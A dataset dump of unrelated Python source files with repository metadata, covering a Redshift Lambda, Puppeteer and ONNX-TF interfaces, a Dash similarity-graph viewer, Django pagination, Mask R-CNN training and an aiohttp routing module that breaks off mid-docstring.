4a020c7fb035fe9f39bf947f05a987b91a921891
| 732
|
py
|
Python
|
lambda/get_statement_result/index.py
|
aws-samples/redshift-data-api-with-step-functions-sample
|
288bc3c4f3300d50d266aa9a23a998cdb9f5dbcb
|
[
"MIT-0"
] | 7
|
2021-07-16T04:48:58.000Z
|
2021-11-08T21:09:12.000Z
|
lambda/get_statement_result/index.py
|
aws-samples/redshift-data-api-with-step-functions-sample
|
288bc3c4f3300d50d266aa9a23a998cdb9f5dbcb
|
[
"MIT-0"
] | null | null | null |
lambda/get_statement_result/index.py
|
aws-samples/redshift-data-api-with-step-functions-sample
|
288bc3c4f3300d50d266aa9a23a998cdb9f5dbcb
|
[
"MIT-0"
] | 2
|
2021-09-24T02:19:35.000Z
|
2021-10-25T00:38:40.000Z
|
import logging
import boto3
import time
# Root logger for this Lambda; INFO so event/result payloads are visible.
logger = logging.getLogger()
logger.setLevel(logging.INFO)
# Module-level client so it is reused across warm Lambda invocations.
rs_data = boto3.client("redshift-data")
def handler(event, context):
    """Fetch all result rows of a finished Redshift Data API statement.

    :param event: expects {'statementId': Id returned by ExecuteStatement}
    :param context: Lambda context (unused)
    :return: {'NumRows': total number of result rows}
    """
    logger.info('Event: %s', event)
    statement_id = event["statementId"]
    results = []
    # We fetch all the records just for demo purpose.
    next_token = None
    while True:
        # Only pass NextToken once the API has handed us one; the first call
        # must not send an empty token.
        kwargs = {'Id': statement_id}
        if next_token:
            kwargs['NextToken'] = next_token
        response = rs_data.get_statement_result(**kwargs)
        # BUG FIX: extend, not append — appending page lists made NumRows
        # count result pages instead of rows.
        results.extend(response['Records'])
        next_token = response.get('NextToken')
        if not next_token:
            break
        time.sleep(0.5)  # gentle pacing between pages
    logger.info('results: %s', results)
    return {
        'NumRows': len(results),
    }
| 22.875
| 53
| 0.625683
|
4a020c890edb1e9be6fe42ee28161d730a50f6cc
| 596
|
py
|
Python
|
PuppeteerLibrary/base/ipuppeteer_library.py
|
sdvicorp/robotframework-puppeteer
|
af6fa68b04c3cdac3a7662cffda6da2a5ace38d1
|
[
"Apache-2.0"
] | 37
|
2019-10-28T01:35:43.000Z
|
2022-03-31T04:11:49.000Z
|
PuppeteerLibrary/base/ipuppeteer_library.py
|
sdvicorp/robotframework-puppeteer
|
af6fa68b04c3cdac3a7662cffda6da2a5ace38d1
|
[
"Apache-2.0"
] | 61
|
2020-07-16T00:18:22.000Z
|
2022-03-24T07:12:05.000Z
|
PuppeteerLibrary/base/ipuppeteer_library.py
|
sdvicorp/robotframework-puppeteer
|
af6fa68b04c3cdac3a7662cffda6da2a5ace38d1
|
[
"Apache-2.0"
] | 10
|
2020-03-03T05:28:05.000Z
|
2022-02-14T10:03:44.000Z
|
from typing import List
from PuppeteerLibrary.library_context.ilibrary_context import iLibraryContext
from abc import ABC, abstractmethod
class iPuppeteerLibrary(ABC):
    """Abstract interface for managing named browser library contexts."""
    @abstractmethod
    def get_current_library_context(self) -> iLibraryContext:
        """Return the library context that keywords currently operate on."""
        pass
    @abstractmethod
    def get_library_context_by_name(self, alias: str) -> iLibraryContext:
        """Return the library context registered under *alias*."""
        pass
    @abstractmethod
    def get_all_library_context(self) -> List[iLibraryContext]:
        """Return every registered library context."""
        pass
    @abstractmethod
    def create_library_context(self,alias: str, browser_type: str) -> iLibraryContext:
        """Create and register a new context for *browser_type* under *alias*."""
        pass
| 27.090909
| 86
| 0.739933
|
4a020c9c08821925abccc4949832565b5eb2ebbb
| 409
|
py
|
Python
|
onnx_tf/handlers/backend/asin.py
|
malisit/onnx-tensorflow
|
3eb41dc923f350ca533f1024f602a842dd55de45
|
[
"Apache-2.0"
] | 1,110
|
2017-11-13T19:34:24.000Z
|
2022-03-29T09:14:56.000Z
|
onnx_tf/handlers/backend/asin.py
|
malisit/onnx-tensorflow
|
3eb41dc923f350ca533f1024f602a842dd55de45
|
[
"Apache-2.0"
] | 768
|
2017-11-17T00:06:27.000Z
|
2022-03-31T20:20:09.000Z
|
onnx_tf/handlers/backend/asin.py
|
malisit/onnx-tensorflow
|
3eb41dc923f350ca533f1024f602a842dd55de45
|
[
"Apache-2.0"
] | 281
|
2017-11-16T19:56:17.000Z
|
2022-03-28T06:25:33.000Z
|
import tensorflow as tf
from onnx_tf.handlers.backend_handler import BackendHandler
from onnx_tf.handlers.handler import onnx_op
from onnx_tf.handlers.handler import tf_func
from .math_mixin import BasicMathMixin
@onnx_op("Asin")
@tf_func(tf.asin)
class Asin(BasicMathMixin, BackendHandler):
  """Backend handler mapping the ONNX Asin op (element-wise arcsine) to tf.asin."""

  @classmethod
  def version_7(cls, node, **kwargs):
    # Asin entered ONNX at opset 7; delegate to the tf_func registered above.
    return [cls.make_tensor_from_onnx_node(node, **kwargs)]
| 25.5625
| 59
| 0.801956
|
4a020d257aefa4eb1aa4ce0ecd9698a53031039d
| 1,712
|
py
|
Python
|
src/studio2021/__init__.py
|
Design-Machine-Group/studio2021
|
ba410de6dfd54f33a02d03dab49e49cf5b286dce
|
[
"MIT"
] | 1
|
2021-01-29T17:53:58.000Z
|
2021-01-29T17:53:58.000Z
|
src/studio2021/__init__.py
|
Design-Machine-Group/studio2021
|
ba410de6dfd54f33a02d03dab49e49cf5b286dce
|
[
"MIT"
] | 1
|
2021-01-22T00:08:18.000Z
|
2021-01-22T00:09:23.000Z
|
src/studio2021/__init__.py
|
Design-Machine-Group/studio2021
|
ba410de6dfd54f33a02d03dab49e49cf5b286dce
|
[
"MIT"
] | null | null | null |
"""
********************************************************************************
studio2021
********************************************************************************
.. currentmodule:: studio2021
.. toctree::
:maxdepth: 1
"""
from __future__ import print_function
import os
import sys
__author__ = ["Tomas Mendez Echenagucia"]
__copyright__ = "Copyright 2020, Design Machine Group - University of Washington"
__license__ = "MIT License"
__email__ = "tmendeze@uw.edu"
__version__ = "0.1.0"
# Well-known package directories, resolved relative to this file.
HERE = os.path.dirname(__file__)
HOME = os.path.abspath(os.path.join(HERE, "../../"))  # repository root
DATA = os.path.abspath(os.path.join(HOME, "data"))
DOCS = os.path.abspath(os.path.join(HOME, "docs"))
TEMP = os.path.abspath(os.path.join(HOME, "temp"))
# Check if package is installed from git.
# If that's the case, try to append the current head's hash to __version__.
# BUG FIX: this block used `compas._os.absjoin` but `compas` was never
# imported, so a NameError was silently swallowed by the bare except and the
# version suffix was never applied. Use os.path (already imported) instead.
try:
    git_head_file = os.path.abspath(os.path.join(HOME, '.git', 'HEAD'))
    if os.path.exists(git_head_file):
        # git head file contains one line that looks like this:
        # ref: refs/heads/master
        with open(git_head_file, 'r') as git_head:
            _, ref_path = git_head.read().strip().split(' ')
            ref_path = ref_path.split('/')
            git_head_refs_file = os.path.abspath(os.path.join(HOME, '.git', *ref_path))
        if os.path.exists(git_head_refs_file):
            with open(git_head_refs_file, 'r') as git_head_ref:
                git_commit = git_head_ref.read().strip()
                __version__ += '-' + git_commit[:8]
except Exception:
    # Best-effort only: a detached HEAD (no 'ref:' line) or unreadable file
    # simply leaves __version__ without a commit suffix.
    pass
__all__ = ["HOME", "DATA", "DOCS", "TEMP"]
def get(filename):
    """Return the absolute path of *filename* inside the package DATA folder."""
    relative = filename.strip('/')
    return os.path.abspath(os.path.join(DATA, relative))
| 27.612903
| 81
| 0.591706
|
4a020e7b7a3a24205383b39b04461eb5ad8848fc
| 6,677
|
py
|
Python
|
drawing/GraphDrawer.py
|
jaskier07/DocumentComparator
|
f5fbd55cb29640adf91a81150dfd73df361954d9
|
[
"MIT"
] | 2
|
2020-01-14T18:17:50.000Z
|
2021-06-10T21:02:46.000Z
|
drawing/GraphDrawer.py
|
jaskier07/DocumentComparator
|
f5fbd55cb29640adf91a81150dfd73df361954d9
|
[
"MIT"
] | null | null | null |
drawing/GraphDrawer.py
|
jaskier07/DocumentComparator
|
f5fbd55cb29640adf91a81150dfd73df361954d9
|
[
"MIT"
] | null | null | null |
import ctypes
import webbrowser
from threading import Thread
import dash
import dash_core_components as core
import dash_cytoscape as cyto
import dash_html_components as html
from drawing.CallbackProvider import CallbackProvider
from drawing.StylesheetProvider import StylesheetProvider
from utils.IOUtils import IOUtils
class GraphDrawer:
__MIN_EDGE_WEIGHT = 0.04
__EDGE_WEIGHT_PRECISION = 4
__MAX_NODE_NAME_LENGTH = 25
__DEFAULT_DROPDOWN_VALUE = '-1'
__DEFAULT_LAYOUT = 'circle'
similarity_arr: None
screen_size: None
demo_mode: bool
stylesheetProvider = StylesheetProvider()
    def __init__(self, n, bitmap=None):
        """Cache the usable screen size and whether to run in demo mode."""
        self.screen_size = self.__get_screen_size()
        self.demo_mode = demo_mode
    def draw(self, arr, filenames):
        """Build the Dash app for the similarity graph and open it in a browser.

        :param arr: similarity matrix (one row/column per document)
        :param filenames: document names matching the matrix rows
        """
        self.similarity_arr = arr
        app = dash.Dash()
        elements, nodes_per_id, full_filename_per_node_id = self.__get_elements_and_filename_dict(arr, filenames)
        # Layout: two control rows, then the PDF preview + cytoscape graph,
        # plus hidden paragraphs used as callback targets.
        app.layout = html.Div([
            html.Div(className='controls-container',
                     children=[
                         self.__get_label_view(),
                         self.__get_dropdown_with_view(),
                         self.__get_label_slider(),
                         self.__get_slider(),
                         self.__get_slider_value()
                     ]),
            html.Div(className='controls-container',
                     children=[
                         self.__get_dropdown_with_documents(full_filename_per_node_id),
                         self.__get_button_select_all()
                     ]),
            html.Div(id='pdf-and-cytoscape-container',
                     children=[
                         html.Div(id='pdf-viewer', children=[
                             html.Iframe(id='pdf-viewer-frame')
                         ]),
                         self.__get_cytoscape(elements)
                     ]),
            html.P(id='cytoscape-tapNodeData-output'),
            html.P(id='cytoscape-tapEdgeData-output'),
            html.P(id='cytoscape-broker'),
        ])
        callback_provider = CallbackProvider(self.__DEFAULT_DROPDOWN_VALUE, nodes_per_id)
        callback_provider.define_callbacks(app)
        # TODO Moving thread creation to method in Application.py
        # Demo mode blocks on the dev server; otherwise the server runs in a
        # background thread so the caller keeps control.
        if self.demo_mode:
            new = webbrowser.open_new('http://127.0.0.1:8050/')
            app.run_server(debug=True)
        else:
            thread = Thread(target=app.run_server)
            webbrowser.open_new('http://127.0.0.1:8050/')
            thread.start()
def __get_cytoscape(self, elements):
return cyto.Cytoscape(
id='cytoscape-container',
elements=elements,
style={
'width': self.screen_size[0] - 300,
'height': self.screen_size[1]
},
layout={
'name': self.__DEFAULT_LAYOUT,
},
stylesheet=self.stylesheetProvider.get_stylesheet(self.__DEFAULT_LAYOUT),
maxZoom=10,
minZoom=0.5
)
@staticmethod
def __get_screen_size():
user32 = ctypes.windll.user32
return user32.GetSystemMetrics(0) - 100, user32.GetSystemMetrics(1) - 180
def __get_elements_and_filename_dict(self, arr, filenames):
elements = []
shortened_filenames = []
node_per_id = dict()
id_per_filename = dict()
full_filename_per_node_id = dict()
curr_id = 0
for filename in filenames:
shortened_filename = IOUtils.shorten_file_name(filename, self.__MAX_NODE_NAME_LENGTH)
shortened_filenames.append(shortened_filename)
full_filename_per_node_id[curr_id] = filename
id_per_filename[shortened_filename] = curr_id
node = {'data': {'id': curr_id, 'label': shortened_filename}}
elements.append(node)
node_per_id[curr_id] = node
curr_id += 1
for (i, row) in enumerate(range(1, len(arr))):
for col in range(0, i + 1):
rgb_val = int((1.0 - arr[row][col]) * 256)
rgb = 'rgb(' + str(rgb_val) + ',' + str(rgb_val) + ',' + str(rgb_val) + ')'
edge = {'data': {'source': id_per_filename.get(shortened_filenames[row]),
'target': id_per_filename.get(shortened_filenames[col]),
'label': arr[row][col],
'weight': self.__get_rounded_weight(arr[row][col]),
'size': 1,
'rgb': rgb
}}
elements.append(edge)
return elements, node_per_id, full_filename_per_node_id
@staticmethod
def __get_rounded_weight(num):
return round(num, 2)
@staticmethod
def __get_dropdown_with_view():
return core.Dropdown(
id='dropdown-view',
value='circle',
clearable=False,
options=[
{'label': name.capitalize(), 'value': name}
for name in ['grid', 'random', 'circle', 'cose', 'concentric']
]
)
def __get_dropdown_with_documents(self, filename_per_node_id):
return core.Dropdown(
id='dropdown-documents',
value=self.__DEFAULT_DROPDOWN_VALUE,
clearable=False,
options=[
{'label': name, 'value': id}
for id, name in filename_per_node_id.items()
]
)
@staticmethod
def __get_slider():
return core.Slider(
id='slider-similarity',
max=1,
min=0,
value=0,
step=0.02,
updatemode='drag',
marks={0: {'label': '0'},
0.2: {'label': '0.2'},
0.4: {'label': '0.4'},
0.6: {'label': '0.6'},
0.8: {'label': '0.8'},
1.0: {'label': '1.0'}
}
)
def __get_slider_value(self):
return html.Div(
id='slider-value'
)
def __get_button_select_all(self):
return html.Button(
'Select all',
id='button-select-all',
className='button'
)
def __get_label_view(self):
return html.Div(
className='label',
children='Select view type'
)
def __get_label_slider(self):
return html.Div(
id='label-slider',
className='label',
children='Adjust similarity'
)
| 33.552764
| 113
| 0.53527
|
4a020e9cfd602cba443e49d9da5f5c272cd24c24
| 375
|
py
|
Python
|
src/nonflask_uploader/__init__.py
|
saungkertas/rest_by_python_flask
|
28da9c74cc401ecffb8d7781664942a07818a26d
|
[
"MIT"
] | null | null | null |
src/nonflask_uploader/__init__.py
|
saungkertas/rest_by_python_flask
|
28da9c74cc401ecffb8d7781664942a07818a26d
|
[
"MIT"
] | null | null | null |
src/nonflask_uploader/__init__.py
|
saungkertas/rest_by_python_flask
|
28da9c74cc401ecffb8d7781664942a07818a26d
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from pkg_resources import get_distribution, DistributionNotFound
# Resolve the installed distribution's version at import time.
try:
    # Change here if project is renamed and does not equal the package name
    # NOTE(review): the '/' in this name looks accidental -- a distribution
    # name cannot contain '/', so the lookup below would always fall back
    # to 'unknown'.  Verify against setup.py/setup.cfg.
    dist_name = 'non/flask_uploader'
    __version__ = get_distribution(dist_name).version
except DistributionNotFound:
    # Package is not installed (e.g. running from a source checkout).
    __version__ = 'unknown'
finally:
    # Keep the module namespace clean of the helper imports.
    del get_distribution, DistributionNotFound
| 31.25
| 75
| 0.768
|
4a020fc3fc5d0f85631fb0a911c77caebcaafbd0
| 1,705
|
py
|
Python
|
model-optimizer/extensions/front/tf/Unpack.py
|
mypopydev/dldt
|
8cd639116b261adbbc8db860c09807c3be2cc2ca
|
[
"Apache-2.0"
] | 3
|
2019-07-08T09:03:03.000Z
|
2020-09-09T10:34:17.000Z
|
model-optimizer/extensions/front/tf/Unpack.py
|
openvino-pushbot/dldt
|
e607ee70212797cf9ca51dac5b7ac79f66a1c73f
|
[
"Apache-2.0"
] | 3
|
2020-11-13T18:59:18.000Z
|
2022-02-10T02:14:53.000Z
|
model-optimizer/extensions/front/tf/Unpack.py
|
openvino-pushbot/dldt
|
e607ee70212797cf9ca51dac5b7ac79f66a1c73f
|
[
"Apache-2.0"
] | 1
|
2018-12-14T07:56:02.000Z
|
2018-12-14T07:56:02.000Z
|
"""
Copyright (c) 2018 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import networkx as nx
from mo.front.common.replacement import FrontReplacementOp
from mo.graph.graph import Node, insert_node_after
from mo.ops.squeeze import Squeeze
class Unpack(FrontReplacementOp):
    """Compensate for IE's "Split" keeping the unpacked dimension.

    TF's Unpack removes the dimension along which it splits, while the IE
    "Split" layer does not.  This replacer appends a Squeeze operation to
    every output of each Unpack node so the extra dimension is dropped.
    """
    op = "Unpack"
    enabled = False

    def nodes_to_remove(self, graph: nx.MultiDiGraph, match: dict):
        # The matched Unpack node itself must stay in the graph.
        return []

    def replace_op(self, graph: nx.MultiDiGraph, node: Node):
        # TODO FIXME incorrect output port assigment sporadically for the TF Faster RCNN network:
        # SecondStagePostprocessor/Decode/get_center_coordinates_and_sizes/sub
        for out_port in range(len(node.out_nodes())):
            squeeze_op = Squeeze(graph, dict(squeeze_dims=[node.axis], name=node.name + '/Squeeze_'))
            insert_node_after(node, squeeze_op.create_node([]), out_port)
        # Keep every original output edge in place.
        return []
| 37.888889
| 119
| 0.727859
|
4a020fdd79f0fc42c351f6da48ee0dcb7e1f228b
| 2,763
|
py
|
Python
|
common/pagination.py
|
govtrack/django-lorien-common
|
27241ff72536b442dfd64fad8589398b8a6e9f4d
|
[
"BSD-3-Clause"
] | 1
|
2020-08-17T06:24:56.000Z
|
2020-08-17T06:24:56.000Z
|
common/pagination.py
|
govtrack/django-lorien-common
|
27241ff72536b442dfd64fad8589398b8a6e9f4d
|
[
"BSD-3-Clause"
] | null | null | null |
common/pagination.py
|
govtrack/django-lorien-common
|
27241ff72536b442dfd64fad8589398b8a6e9f4d
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Django-common pagination module dramatically simplifies the pagination task.
You only have to do following things.
In view::
@render_to('foo_list.html')
def foo_list(request):
qs = Foo.objects.all()
page = paginate(qs, request)
return {'page': page,
}
In template::
<ul>
{% for item in page.object_list %}
<li>{{ item }}</li>
{% endfor %}
</ul>
{% include "pagination.html" %}
If you want to know how this work under the hood please look at source code.
"""
from django.core.paginator import Paginator, EmptyPage, InvalidPage
from common.templatetags.common_tags import alter_qs
def paginate(qs, request, per_page=15, frame_size=10):
    """
    Return extended ``django.core.paginator.Page`` object

    Args:
        :qs: queryset which should be paginated
        :request: django request object
        :per_page: number of objects per page
        :frame_size: number of visible pages (does not include first and
            last page); ``None`` means show every page
    """
    # Fall back to page 1 on a missing or non-numeric ?page= value.
    try:
        page_number = int(request.GET.get('page', 1))
    except ValueError:
        page_number = 1
    paginator = Paginator(qs, per_page)
    try:
        page = paginator.page(page_number)
    except (EmptyPage, InvalidPage):
        page_number = 1
        page = paginator.page(1)
    # Prev/next/first/last URLs keep the rest of the query string intact.
    query_string = request.META['QUERY_STRING']
    if page.has_previous():
        page.previous_page_url = alter_qs(query_string, 'page', page.previous_page_number())
    else:
        page.previous_page_url = None
    if page.has_next():
        page.next_page_url = alter_qs(query_string, 'page', page.next_page_number())
    else:
        page.next_page_url = None
    page.first_page_url = alter_qs(query_string, 'page', 1)
    page.last_page_url = alter_qs(query_string, 'page', page.paginator.num_pages)
    urls = []
    if frame_size is None:
        # Show every page.
        # BUGFIX: this branch assigned ``end`` (never used) and left ``stop``
        # unassigned, so ``frame_end_page = stop`` below raised NameError.
        start = 1
        stop = page.paginator.num_pages
        for x in page.paginator.page_range:
            urls.append((x, alter_qs(query_string, 'page', x)))
    else:
        # Centre a window of ``frame_size`` pages around the current page,
        # shifting it back inside [1, num_pages] at either boundary.
        start = max(1, page.number - int(frame_size / 2.0))
        stop = min(page.paginator.num_pages, start + frame_size - 1)
        if stop == page.paginator.num_pages:
            if stop - start < (frame_size - 1):
                start = max(1, stop - frame_size)
        if start == 1:
            if stop - start < (frame_size - 1):
                stop = min(page.paginator.num_pages, start + frame_size)
        # BUGFIX: ``xrange`` is Python 2 only; use ``range``.
        for x in range(start, stop + 1):
            urls.append((x, alter_qs(query_string, 'page', x)))
    page.paginator.frame = urls
    page.paginator.frame_start_page = start
    page.paginator.frame_end_page = stop
    return page
| 29.084211
| 92
| 0.624683
|
4a0210015f46deaeb2db1ecfe7909f45dd994e3a
| 2,733
|
py
|
Python
|
pyon/datastore/postgresql/test/test_pg_query.py
|
ooici/pyon
|
122c629290d27f32f2f41dafd5c12469295e8acf
|
[
"BSD-2-Clause"
] | 2
|
2015-06-09T16:07:09.000Z
|
2015-07-28T10:06:31.000Z
|
pyon/datastore/postgresql/test/test_pg_query.py
|
ooici/pyon
|
122c629290d27f32f2f41dafd5c12469295e8acf
|
[
"BSD-2-Clause"
] | 3
|
2020-07-22T15:14:55.000Z
|
2021-12-13T19:35:06.000Z
|
pyon/datastore/postgresql/test/test_pg_query.py
|
ooici/pyon
|
122c629290d27f32f2f41dafd5c12469295e8acf
|
[
"BSD-2-Clause"
] | null | null | null |
#!/usr/bin/env python
__author__ = 'Brian McKenna'
from nose.plugins.attrib import attr
from unittest import SkipTest
from mock import Mock, patch, ANY
from pyon.util.int_test import IonIntegrationTestCase
from pyon.util.unit_test import IonUnitTestCase
from pyon.datastore.datastore_query import DatastoreQueryBuilder
from pyon.datastore.postgresql.pg_query import PostgresQueryBuilder
import interface.objects
@attr('UNIT', group='datastore')
class PostgresDataStoreUnitTest(IonUnitTestCase):
    def test_wkt(self):
        """Verify the DatastoreQuery -> PostgresQuery -> SQL translation for
        PostGIS WKT geometry operators, with and without a buffer."""
        wkt = 'POINT(-72.0 40.0)'
        buf = 0.1
        geom_plain = "ST_GeomFromEWKT('SRID=4326;POINT(-72.0 40.0)')"
        geom_buffered = "ST_Buffer(ST_GeomFromEWKT('SRID=4326;POINT(-72.0 40.0)'), 0.100000)"
        # (query-builder method, PostGIS SQL function) pairs to exercise.
        operators = [('overlaps_geom', 'ST_Intersects'),
                     ('contains_geom', 'ST_Contains'),
                     ('within_geom', 'ST_Within')]
        for buffer_val, geom_sql in ((0.0, geom_plain), (buf, geom_buffered)):
            for builder_name, sql_fn in operators:
                qb = DatastoreQueryBuilder()
                where_clause = getattr(qb, builder_name)(qb.RA_GEOM_LOC, wkt, buffer_val)
                qb.build_query(where=where_clause)
                pqb = PostgresQueryBuilder(qb.get_query(), 'test')
                self.assertEquals(pqb.get_query(),
                                  "SELECT id,doc FROM test WHERE %s(geom_loc,%s)" % (sql_fn, geom_sql))
| 47.947368
| 166
| 0.71094
|
4a0210a01c314590a57b744354b412470a071a82
| 6,911
|
py
|
Python
|
mrcnn/scripts/train.py
|
tejasmhos/clomask
|
49954f1c1aa8efa775fd8f509287de93c01f2ccc
|
[
"MIT"
] | 8
|
2019-03-22T19:48:33.000Z
|
2019-08-31T06:38:58.000Z
|
mrcnn/scripts/train.py
|
tejasmhos/clomask
|
49954f1c1aa8efa775fd8f509287de93c01f2ccc
|
[
"MIT"
] | 31
|
2018-10-25T09:33:13.000Z
|
2021-08-25T15:29:08.000Z
|
mrcnn/scripts/train.py
|
tejasmhos/clomask
|
49954f1c1aa8efa775fd8f509287de93c01f2ccc
|
[
"MIT"
] | 5
|
2018-11-02T19:52:47.000Z
|
2020-04-15T04:27:37.000Z
|
"""
Training module for maskrcnn on Bottles, Boxes and Candy bags.
"""
from config import *
import h5py
from imgaug import augmenters as iaa
from sklearn.model_selection import train_test_split
from random import randint
import numpy as np
import json
class ClomaskDataset(utils.Dataset):
    """
    Mask R-CNN dataset wrapper for the Clomask images and masks on disk.
    """
    def load_shapes(self, id_list, train_path):
        """
        Register the object classes (read from id_map.json) and one image
        entry per id in ``id_list``, rooted at ``train_path``.
        """
        with open(ROOT_DIR + 'id_map.json') as mapping_file:
            class_mapping = (json.load(mapping_file))
        # Add classes
        for val in class_mapping.keys():
            self.add_class('clomask', val, class_mapping[val])
        self.train_path = train_path
        # Add images
        for i, id_ in enumerate(id_list):
            self.add_image('clomask', image_id=i, path=None,
                           img_name=id_)

    def _load_img(self, fname):
        """Read an image file from disk and convert it to RGB."""
        img = cv2.imread(fname)
        img = cv2.cvtColor(img, cv2.COLOR_BGRA2RGB)
        return img

    def load_image(self, image_id, color):
        """
        Load the image for ``image_id``: tries the .png file first and falls
        back to .jpg.  (``color`` is unused; kept for interface compatibility
        with utils.Dataset callers.)
        """
        info = self.image_info[image_id]
        path = self.train_path + info['img_name'] + \
               IMAGE_PATH + info['img_name'] + '.png'
        # BUGFIX: was a bare "except:", which also swallowed
        # KeyboardInterrupt/SystemExit; narrowed to Exception.
        try:
            img = self._load_img(path)
        except Exception:
            path = self.train_path + info['img_name'] + \
                   IMAGE_PATH + info['img_name'] + '.jpg'
            img = self._load_img(path)
        return img

    def image_reference(self, image_id):
        """
        Return the stored path of the image (None for this dataset).
        """
        info = self.image_info[image_id]
        return info['path']

    def load_mask(self, image_id):
        """
        Generate instance masks for the image with the given image ID.

        Prefers a pre-packed .h5 file (datasets "mask_images"/"labels");
        otherwise collects the per-instance PNG masks, whose class id is
        encoded after '$' in the file name.  Returns a (mask, class_ids)
        pair with the mask laid out instance-last (H x W x N).
        """
        info = self.image_info[image_id]
        path = self.train_path + info['img_name'] + \
               MASK_PATH + info['img_name'] + '.h5'
        if os.path.exists(path):
            with h5py.File(path, "r") as hf:
                mask = hf["mask_images"][()]
                class_ids = hf["labels"][()]
        else:
            path = self.train_path + info['img_name']
            mask = []
            class_ids = []
            for mask_file in next(os.walk(path + MASK_PATH))[2]:
                if 'png' in mask_file:
                    mask_ = cv2.imread(path + MASK_PATH + mask_file, 0)
                    mask_ = np.where(mask_ > 128, 1, 0)
                    # Add mask only if its area is larger than one pixel
                    if np.sum(mask_) >= 1:
                        mask.append(np.squeeze(mask_))
                        class_id = int(mask_file.split('$')[1][:-4])
                        class_ids.append(class_id)
        # Runs for both branches: converts the N-first stack / list of H x W
        # masks into the H x W x N layout expected by Mask R-CNN.
        mask = np.stack(mask, axis=-1)
        return mask.astype(np.uint8), np.array(class_ids)
class ClomaskTrain(object):
    """
    Drives the Mask R-CNN training schedule for the Clomask dataset.
    """
    def __init__(self):
        self.init_weights = 'coco'
        self.config = ClomaskConfig()
        self.learning_rate_one = 1e-4
        self.learning_rate_two = 1e-5
        self.learning_rate_three = 1e-6
        self.train_data = None
        self.val_data = None

    def prepare_dataset(self):
        """Build and prepare the train/validation datasets and derive the
        per-epoch step counts from their sizes."""
        train_ids = os.listdir(TRAIN_PATH)
        test_ids = os.listdir(TEST_PATH)
        # Training dataset.
        training = ClomaskDataset()
        training.load_shapes(train_ids, TRAIN_PATH)
        training.prepare()
        # Validation dataset.
        validation = ClomaskDataset()
        validation.load_shapes(test_ids, TEST_PATH)
        validation.prepare()
        # Size the epoch to one pass over each dataset.
        self.config.STEPS_PER_EPOCH = len(train_ids) // self.config.BATCH_SIZE
        self.config.VALIDATION_STEPS = len(test_ids) // self.config.BATCH_SIZE
        self.train_data = training
        self.val_data = validation

    def weight_initialize(self):
        """
        Create the training-mode model and load the starting weights
        ('coco' or 'imagenet'), skipping the class-specific head layers.
        """
        self.model = modellib.MaskRCNN(mode="training", config=self.config, model_dir=MODEL_DIR)
        excluded = ["mrcnn_class_logits", "mrcnn_bbox_fc", "mrcnn_bbox", "mrcnn_mask"]
        if self.init_weights == "imagenet":
            self.model.load_weights(self.model.get_imagenet_weights(), by_name=True, exclude=excluded)
        elif self.init_weights == "coco":
            self.model.load_weights(COCO_PATH, by_name=True, exclude=excluded)

    def model_train(self):
        """Run the three-stage schedule: 30/60/90 epochs with decreasing
        learning rates, all layers trainable, flip/rotate augmentation."""
        augmentation = iaa.Sequential([
            iaa.Sometimes(0.5, iaa.Fliplr(0.5), iaa.Flipud(0.5)),
            iaa.OneOf([iaa.Affine(rotate=0),
                       iaa.Affine(rotate=90),
                       iaa.Sometimes(0.5, iaa.Affine(rotate=(-20, 20)))])
        ])
        schedule = ((self.learning_rate_one, 30),
                    (self.learning_rate_two, 60),
                    (self.learning_rate_three, 90))
        for rate, epochs in schedule:
            self.model.train(self.train_data, self.val_data,
                             learning_rate=rate,
                             epochs=epochs,
                             layers='all',
                             augmentation=augmentation)
def main():
    """Run the full Clomask training pipeline end to end."""
    trainer = ClomaskTrain()
    trainer.prepare_dataset()
    trainer.weight_initialize()
    trainer.model_train()
if __name__ == '__main__':
    # Time the whole run and report it in minutes.
    started_at = time.time()
    main()
    print('Elapsed time', round((time.time() - started_at) / 60, 1), 'minutes')
| 35.994792
| 111
| 0.559687
|
4a0212828ab0cd6ffe2449048e5bb987dd07f6b2
| 7,979
|
py
|
Python
|
www/coreweb.py
|
bjb421361141/demoProject
|
66a4b2dea346831705342e2c1e3599814c079d51
|
[
"Apache-2.0"
] | null | null | null |
www/coreweb.py
|
bjb421361141/demoProject
|
66a4b2dea346831705342e2c1e3599814c079d51
|
[
"Apache-2.0"
] | null | null | null |
www/coreweb.py
|
bjb421361141/demoProject
|
66a4b2dea346831705342e2c1e3599814c079d51
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019/8/18 11:02
# @Author : Baijb
import asyncio
import functools
import inspect
import logging
import os
import re
from urllib import parse
from aiohttp import web
from www.apis import APIError
_RE_HANDLE_NAME = re.compile(r'^[0-9a-zA-Z_.]+handler$') # handel名称匹配规则
def get(path):
    """Decorator factory: mark a handler as serving HTTP GET at *path*.

    The HTTP verb and route are stored on the wrapper as ``__method__`` and
    ``__route__`` so add_route() can register the handler later.
    """
    def mark(func):
        @functools.wraps(func)
        def handler(*args, **kwargs):
            return func(*args, **kwargs)
        handler.__method__ = 'GET'
        handler.__route__ = path
        return handler
    return mark
def post(path):
    """Decorator factory: mark a handler as serving HTTP POST at *path*.

    The HTTP verb and route are stored on the wrapper as ``__method__`` and
    ``__route__`` so add_route() can register the handler later.
    """
    def mark(func):
        @functools.wraps(func)
        def handler(*args, **kwargs):
            return func(*args, **kwargs)
        handler.__method__ = 'POST'
        handler.__route__ = path
        return handler
    return mark
def get_required_kw_args(fn):
    """Return a tuple with the names of *fn*'s keyword-only parameters that
    have no default value (the caller must supply them by name).

    KEYWORD_ONLY parameters are those declared after ``*`` or ``*args``.
    """
    sig_params = inspect.signature(fn).parameters
    return tuple(name for name, p in sig_params.items()
                 if p.kind == inspect.Parameter.KEYWORD_ONLY
                 and p.default == inspect.Parameter.empty)
def get_named_kw_args(fn):
    """Return a tuple with the names of all keyword-only parameters of *fn*,
    including those that do have a default value."""
    sig_params = inspect.signature(fn).parameters
    return tuple(name for name, p in sig_params.items()
                 if p.kind == inspect.Parameter.KEYWORD_ONLY)
def has_named_kw_args(fn):
    """Return True if *fn* declares any keyword-only parameter.

